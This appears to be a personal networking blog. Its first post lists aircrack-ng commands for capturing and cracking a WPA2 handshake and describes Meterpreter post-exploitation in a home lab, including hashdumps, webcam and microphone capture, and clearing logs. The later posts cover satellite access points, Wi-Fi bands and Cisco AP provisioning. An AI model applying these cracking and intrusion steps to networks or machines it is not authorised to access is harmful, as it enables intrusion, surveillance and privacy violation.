Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff.  So I got some time to play around 🙂 on my home lab. – so here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:

airmonng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security.  I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/  Oh…. and I cleared the logs as I left the scene – all within a couple of hours.

So keep those systems secure and up to date peeps!

Lake Argyle – Sat and SSN

A quick install of Satellite Communications, using the Telsta iterra network and SSN (Silver Springs Networks) Access Points in remote WA. One of a few AP’s that have to be Sat connected due to there being no 3/4G. Nevertheless it worked as expected. These SSN AP’s operate on both 900 MHz and 2.4 GHz which increases the capacity and reliability of the meshed network, ultimately providing access and supporting Smart Meters, out bush.

Working in 40 degree heat with shade provided, courtesy of Horizon Power 👌🏼


2.4GHz and 5GHz Wireless

OK, so what’s the difference between 2.4 GHz and 5GHz wireless?

2.4GHz frequency is able to reach farther than the 5GHz because the waves attenuate much faster and at higher frequencies.  So if you are more concerned with the coverage, select 2.4GHz rather than 5GHz.

The second difference is the number of devices on the frequencies. 2.4GHz suffers more interference than 5GHz.
  1. The older 11g standard only uses the 2.4GHz frequency, majority of the world is on it. 2.4 GHz has fewer channel options with only three of them non-overlapping, while 5GHz has 23 non-overlapping channels.
  2. A lot of other devices are also on the 2.4 GHz frequencies, the biggest offenders are microwaves and cordless phones. These devices add noise to the medium that can further decrease the speed of wireless networks.
In both aspects, choosing to deploy on the 5GHz frequency is the much better option as you have more channels to use to isolate yourself from other networks and there are far fewer interference sources.
But the radar and military frequency is also 5GHz, so 5GHz wireless may also have some interference, and many countries require that wireless devices working on 5GHz should support DFS (Dynamic Frequency Selection) and TPC (Transmitting Power Control).
  1. 5GHz has a shorter range compared with 2.4GHz;
  2. The 2.4GHz frequency is way more crowded than 5GHz, devices on 2.4GHz suffer much more interference than the ones on 5GHz;
  3. Fewer devices are capable of using the 5GHz channel than the 2.4GHz channel.

If there is too much interference around and your clients support 5GHz, it’s recommended to use 5GHz wireless network, otherwise you’d better select 2.4GHz.

Cisco: Air Provisioning

I was recently asked to design a point-2-point wireless solution which fast became a point-to-multipoint.  Regardless of the design the Access Points used were AIR-AP1532E-UXK9 with a vision of utilising the 5Ghz back-haul and a 14dBi directional antenna to cover line-of-sight.

These UX Access Points address the worldwide regulatory compliance by dynamically setting their regulatory domain/country based on their GPS location – sounds simple right and it is important to point out that you can’t use the 5Ghz until the AP has been provisioned, as the 5Ghz stays in Scanner mode.

However, the provisioning of these Access Points is carried out by either the Smartphone method or via WLC.  I needed to use my iPhone but the Apple iPhone app was broken (confirmed by Cisco: Bug ID CSCuw28658), nor did the Android App work, but thank you Windows Smart phone :), you saved the day (never thought I would say that).

Followed the User Guide to set the domain. remembering to use the WPA v2 and the default userid/password for AP provisioning and not the SSID Password :-/

The un-provisioned AP looks like this:


The provisioned AP (to Australia/NZ), looks like this:


Got there in the end but Dear Cisco, I’m unimpressed with the process for provisioning these AP’s, it definitely needs improvement.